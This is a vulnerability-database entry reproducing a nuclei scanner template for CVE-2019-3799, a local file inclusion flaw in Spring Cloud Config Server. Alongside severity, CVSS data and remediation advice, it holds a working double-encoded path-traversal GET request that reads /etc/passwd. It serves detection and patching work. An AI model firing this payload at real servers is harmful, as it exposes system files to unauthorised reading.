Lucene search
K

Spring Cloud Config Server - Local File Inclusion

🗓️ 18 Jun 2026 12:11:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Spring Cloud Config Server vulnerability - Local File Inclusion, CVE-2019-379

Related
Refs
Code
id: CVE-2019-3799

info:
  name: Spring Cloud Config Server - Local File Inclusion
  author: madrobot
  severity: medium
  description: Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: |
    Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches.
  reference:
    - https://github.com/mpgn/CVE-2019-3799
    - https://pivotal.io/security/cve-2019-3799
    - https://www.oracle.com/security-alerts/cpuapr2022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3799
    - https://github.com/0xT11/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-3799
    cwe-id: CWE-22
    epss-score: 0.85295
    epss-percentile: 0.99687
    cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: vmware
    product: spring_cloud_config
  tags: cve,cve2019,lfi,vmware,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e3eeef8ea8578c0a028fb508567188f1ceb4540a496df5945e4a96bdefd57547022100c5fc6f79f0f050c803570ba5c35ebd3f66cbac8c2a12c393fee38d534b7ab192:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.5
EPSS0.85295
28